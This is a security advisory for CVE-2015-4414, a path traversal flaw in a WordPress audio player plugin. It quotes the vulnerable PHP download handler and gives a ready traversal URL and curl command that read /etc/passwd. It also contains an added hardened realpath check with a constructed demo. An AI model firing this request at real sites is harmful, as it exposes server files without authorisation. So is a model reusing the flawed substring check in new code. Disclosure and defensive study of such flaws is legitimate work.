WordPress SE HTML5 Album Audio Player Plugin Local File Inclusion Vulnerability (CVE-2015-4414)
Release date: 2015-06-09
Updated: 2015-06-18
Affected systems: WordPress SE HTML5 Album Audio Player <= 1.1.0
Description:
BUGTRAQ ID: 75093
CVE(CAN) ID: CVE-2015-4414
The SE HTML5 Album Audio Player plugin archives, presents and plays mp3 files (or other HTML5 audio formats) on a website.
SE HTML5 Album Audio Player (se-html5-album-audio-player) 1.1.0 and earlier contain a directory traversal vulnerability in download_audio.php; a remote attacker can read arbitrary files by supplying ".." in the file parameter.
<*Source: Larry W. Cashdollar (lwc@vapid.dhs.org) *>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!
http://www.example.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/
Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for WordPress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path; it only checks whether the path contains /wp-content/uploads, which is easily defeated with ../.
This vulnerability doesn't require authentication to the WordPress site.
File ./se-html5-album-audio-player/download_audio.php:
<?php
$file_name = $_SERVER["DOCUMENT_ROOT"] . $_GET["file"];
// substring test only: "../" after /wp-content/uploads/ still passes
$is_in_uploads_dir = strpos($file_name, "/wp-content/uploads/");
// make sure it's a file before doing anything!
if( is_file($file_name) && $is_in_uploads_dir !== false ) {

    // required for IE
    if(ini_get("zlib.output_compression")) { ini_set("zlib.output_compression", "Off"); }

    // get the file mime type using the file extension
    switch(strtolower(substr(strrchr($file_name, "."), 1))) {
        case "pdf": $mime = "application/pdf"; break;
        case "zip": $mime = "application/zip"; break;
        case "jpeg":
        case "jpg": $mime = "image/jpg"; break;
        default: $mime = "application/force-download";
    }
    header("Pragma: public"); // required
    header("Expires: 0"); // no cache
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
    header("Last-Modified: ".gmdate("D, d M Y H:i:s", filemtime($file_name))." GMT");
    header("Cache-Control: private", false);
    header("Content-Type: ".$mime);
    header("Content-Disposition: attachment; filename=\"".basename($file_name)."\"");
    header("Content-Transfer-Encoding: binary");
    header("Content-Length: ".filesize($file_name)); // provide file size
    header("Connection: close");
    readfile($file_name); // push it out
    exit();
}
The above code does not verify whether a user is logged in, nor does it properly check whether the file lies outside of the uploads directory.
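As an added example, not part of the original advisory or the plugin's code, the following PHP places the plugin's substring check beside a canonical-path check that rejects the traversal; the temporary directory tree, file names and traversal input are constructed for the demonstration.

```php
<?php
// Added example, not the plugin's code. The plugin only asks whether the
// string "/wp-content/uploads/" occurs somewhere in the path, so a value
// such as "/wp-content/uploads/../../secret.txt" passes. The hardened
// version canonicalises the path and requires the uploads directory as prefix.

// The plugin's check, reduced to its path test (substring match only).
function weak_check(string $document_root, string $requested): bool {
    $file_name = $document_root . $requested;
    return strpos($file_name, "/wp-content/uploads/") !== false;
}

// Hardened check: realpath() resolves ".." and symlinks; the result must be
// a regular file located under the uploads directory. Returns null on reject.
function safe_upload_path(string $document_root, string $requested): ?string {
    $uploads = realpath($document_root . "/wp-content/uploads");
    $target  = realpath($document_root . $requested);
    if ($uploads === false || $target === false || !is_file($target)) {
        return null;
    }
    // Compare with the trailing separator so "/uploads-other/" cannot match.
    $prefix = $uploads . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo tree under the temp dir, standing in for DOCUMENT_ROOT.
$root = sys_get_temp_dir() . "/demo_root_" . getmypid();
mkdir("$root/wp-content/uploads", 0700, true);
file_put_contents("$root/wp-content/uploads/track.mp3", "ID3");
file_put_contents("$root/secret.txt", "must not be downloadable");

$legit     = "/wp-content/uploads/track.mp3";
$traversal = "/wp-content/uploads/../../secret.txt";   // constructed input

var_dump(weak_check($root, $traversal));             // substring test accepts the traversal
var_dump(safe_upload_path($root, $traversal));       // canonical check rejects it
var_dump(safe_upload_path($root, $legit) !== null);  // a real upload is still served

// Clean up the demo tree.
unlink("$root/secret.txt");
unlink("$root/wp-content/uploads/track.mp3");
rmdir("$root/wp-content/uploads"); rmdir("$root/wp-content"); rmdir($root);
```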
CVEID: 2015-4414
OSVDB:
Exploit Code:
• $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
Recommendation:
Vendor patch:
WordPress
---------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
https://wordpress.org/plugins/se-html5-album-audio-player/